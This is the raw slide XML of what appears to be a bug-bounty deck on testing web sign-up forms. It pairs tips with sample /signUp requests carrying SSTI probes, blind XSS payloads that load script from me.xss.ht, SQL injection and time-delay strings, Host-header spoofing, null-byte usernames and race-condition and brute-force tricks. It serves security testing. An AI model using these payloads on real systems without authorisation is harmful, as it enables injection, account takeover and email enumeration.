                </a:solidFill>
              </a:rPr>
              <a:t>&amp;password=********&amp;captcha=Random&amp;token=CSRF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04" name="Google Shape;404;p5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05" name="Google Shape;405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11" name="Google Shape;411;p5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5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13" name="Google Shape;413;p5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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sign Up With </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Company Mail Address e.g. admin@company.com </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Then Try To Access To All Endpoints Of The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Company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Without V</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>erifying</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> admin@company.com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14" name="Google Shape;41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/signUp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firstname=I&amp;lastname=am&amp;email=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin@company.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;password=*****&amp;captcha=Random&amp;token=CSRF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416" name="Google Shape;416;p5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17" name="Google Shape;417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Company Accepted</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> admin@company.com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As Email Address But You Can</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'t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Activate It , Try </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Spoof Host Header e.g X-Forwarded-Host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X-Host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23" name="Google Shape;423;p5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/signUp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X-Forwarded-Host: me.com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firstname=I&amp;lastname=am&amp;email=admin@gmail.com&amp;password=********&amp;captcha=Random&amp;token=CSRF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424" name="Google Shape;424;p5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25" name="Google Shape;425;p5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Note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27" name="Google Shape;42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00" y="150875"/>
            <a:ext cx="1278801" cy="127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34" name="Google Shape;434;p5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36" name="Google Shape;436;p5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Insert </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSTI Payloads e.g. {{7*7}} </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{7*7}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${7*7}</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> In Username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First Name OR Last Name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37" name="Google Shape;43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5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/signUp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firstname=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{7*7}}</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;lastname=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{7*7}}</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;username=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{7*7}}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&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>email=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;password=*****&amp;captcha=Random&amp;token=CSRF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439" name="Google Shape;439;p5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40" name="Google Shape;440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57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42" name="Google Shape;442;p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9399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7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44" name="Google Shape;444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57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="42771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46" name="Google Shape;446;p5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2925" y="43394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57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48" name="Google Shape;448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3525200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54" name="Google Shape;454;p5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56" name="Google Shape;456;p5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Insert </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;% </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In Username , First Name OR Last Name , So If </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;% Reflected In Email Body</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Try To Inject </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;%= 7 * 7 %&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get SSTI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57" name="Google Shape;45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8575" y="2675525"/>
            <a:ext cx="4973700" cy="20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60" name="Google Shape;460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Sign Up On </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web AND Mobile App </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Understand How Company Deal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With </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Registration</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> And </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Read The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Received</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Email</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Know What is Reflected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14" name="Google Shape;214;p4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/signUp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first</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=I&amp;last</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=am&amp;email=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me@gmail.com</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00FF00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&amp;password=*****&amp;captcha=Random&amp;token=CSRF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215" name="Google Shape;215;p4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F3F3F3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F3F3F3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="216" name="Google Shape;21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1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18" name="Google Shape;218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Note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21" name="Google Shape;221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3400" y="150875"/>
            <a:ext cx="1278801" cy="127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66" name="Google Shape;466;p5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68" name="Google Shape;468;p5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Set Your Name , First Name , Last Name etc As Blind XSS e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;script src=//me.xss.ht&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get BXSS In Admin Panel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69" name="Google Shape;46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/signUp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firstname=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;script src=//me.xss.ht&gt;&lt;/script&gt;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&amp;lastname=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;script src=//me.xss.ht&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;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email=me@gmail.com&amp;password=**************&amp;captcha=Random&amp;token=CSRF</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="471" name="Google Shape;471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5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78" name="Google Shape;478;p6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6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80" name="Google Shape;480;p6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Set Your Name , First Name , Last Name etc As Blind XSS e.g.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&lt;img src="//me.xss.ht"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get BXSS In Admin Panel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81" name="Google Shape;48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6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/signUp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firstname=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;img src="//me.xss.ht"&gt;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&amp;lastname=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;img src="//me.xss.ht"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;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email=me@gmail.com&amp;password=**************&amp;captcha=Random&amp;token=CSRF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483" name="Google Shape;483;p6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84" name="Google Shape;484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90" name="Google Shape;490;p6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6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92" name="Google Shape;492;p6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Set Password As Blind XSS e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;script src=//me.xss.ht&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> OR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XSS Payload To Know If Your Password Reflect Plaintext In Backend OR Not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93" name="Google Shape;49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6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/signUp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firstname=I&amp;lastname=am&amp;email=me&amp;password=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;script src=//me.xss.ht&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;captcha=Random&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>token=CSRF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495" name="Google Shape;495;p6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96" name="Google Shape;496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61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98" name="Google Shape;498;p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3475" y="3514700"/>
            <a:ext cx="462101" cy="365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4025" y="39399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61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01" name="Google Shape;501;p61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02" name="Google Shape;502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6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10" name="Google Shape;510;p6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Set Your Name , First Name , Last Name etc As </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TRUE , NULL ,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UNDEFINED</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> etc  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11" name="Google Shape;51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6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/signUp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firstname=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TRUE</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;lastname=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TRUE</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;email=me@gmail.com&amp;password=**************&amp;captcha=Random&amp;token=CSRF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513" name="Google Shape;513;p6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14" name="Google Shape;51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20" name="Google Shape;520;p6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6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22" name="Google Shape;522;p6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Insert </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Invisible Range %00 To %FF in Your Email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Username</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. Victim's Username is bob , You Can't Register it So Use bob%00 OR %01bob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23" name="Google Shape;52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6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25" name="Google Shape;525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8575" y="2675525"/>
            <a:ext cx="4973700" cy="20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63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28" name="Google Shape;528;p6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4025" y="3091500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63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30" name="Google Shape;530;p6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4025" y="3544600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36" name="Google Shape;536;p6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6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38" name="Google Shape;538;p6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Insert Large String 50.000+ Characters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Numbers </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>in POST Parameters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To Cause Errors Exposing Sensitive Information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39" name="Google Shape;53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6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41" name="Google Shape;541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3150" y="2675525"/>
            <a:ext cx="4973700" cy="20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48" name="Google Shape;548;p6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6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50" name="Google Shape;550;p6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Set Password e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%01%E2%80%AEalert%0D%0A</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Then Try To L</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>og In Only Using %01 , Log In Without CRLF</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> And Is trela Accepted Instead Of alert ?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51" name="Google Shape;55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6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/signUp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firstname=I&amp;lastname=am&amp;email=me&amp;password=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%01%E2%80%AEalert%0D%0A</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;captcha=Random&amp;token=CSRF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553" name="Google Shape;553;p6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54" name="Google Shape;554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65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56" name="Google Shape;556;p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 Company Uses </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Invitation</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Account </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use Race Condition Technique</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Create Multi Accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> By Using Only One Invitation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62" name="Google Shape;562;p6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/signUp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Accept-Encoding: gzip, deflate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email=m&amp;password=********&amp;Invitation=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Random</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="563" name="Google Shape;56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6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65" name="Google Shape;565;p6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6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67" name="Google Shape;567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6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Do </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brute Force To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create Multi Accounts OR Enumerate Email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Addresses </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If The Company Doesn</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'t Send Activation Link To Your Account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74" name="Google Shape;574;p6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/signUp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Accept-Encoding: gzip, deflate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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;password=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>********</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="575" name="Google Shape;57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6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77" name="Google Shape;577;p6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6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79" name="Google Shape;579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6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81" name="Google Shape;581;p67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82" name="Google Shape;58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025" y="3091500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88" name="Google Shape;588;p6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6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90" name="Google Shape;590;p6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Insert </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLi Payloads e.g. ' AND '1' = '2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";WAITFOR DELAY '0.0.20'-- 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Blind XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> In User-Agent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91" name="Google Shape;59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6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/signUp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r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' AND '1' = '2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firstname=I&amp;lastname=am&amp;email=me&amp;password=*****************&amp;captcha=Random&amp;token=CSRF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593" name="Google Shape;593;p6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94" name="Google Shape;594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You Need Business Email Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username@bugcrowdninja.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> OR </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username@wearehackerone.com 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227" name="Google Shape;227;p4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/signUp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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@wearehackerone.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;password=*****&amp;captcha=Random&amp;token=CSR&amp;F</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>firstname=I&amp;lastname=am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228" name="Google Shape;228;p42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29" name="Google Shape;22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3091500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31" name="Google Shape;231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975" y="2675525"/>
            <a:ext cx="6951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Note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34" name="Google Shape;234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3400" y="150875"/>
            <a:ext cx="1278801" cy="127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00" name="Google Shape;600;p6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6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02" name="Google Shape;602;p6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Inject Blind XSS e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;script src=//me.xss.ht&gt;&lt;/script&gt;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Time-Based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SQLi e.g. ";WAITFOR DELAY '0.0.20'-- </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In X-Forwarded-For Header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03" name="Google Shape;60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6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05" name="Google Shape;605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6000" y="2675525"/>
            <a:ext cx="4973700" cy="20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12" name="Google Shape;612;p7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7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14" name="Google Shape;614;p7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Set Your Birthday </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Today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Tomorrow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Test Functionality Of B</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uying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Giftcards With Birthday Discounts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15" name="Google Shape;61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7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/signUp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firstname=I&amp;lastname=am&amp;email=me@gmail.com&amp;birthday=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Today</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;password=*****&amp;captcha=Random&amp;token=CSRF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617" name="Google Shape;617;p7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18" name="Google Shape;618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24" name="Google Shape;624;p7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7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26" name="Google Shape;626;p7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You Can Register By Using Mobile-Number  , The Server Will Ask You about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OTP So Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Figure Out </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OTP Will Expire OR Not</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , If Not There Is Issue Here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27" name="Google Shape;62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7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HTTP/1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
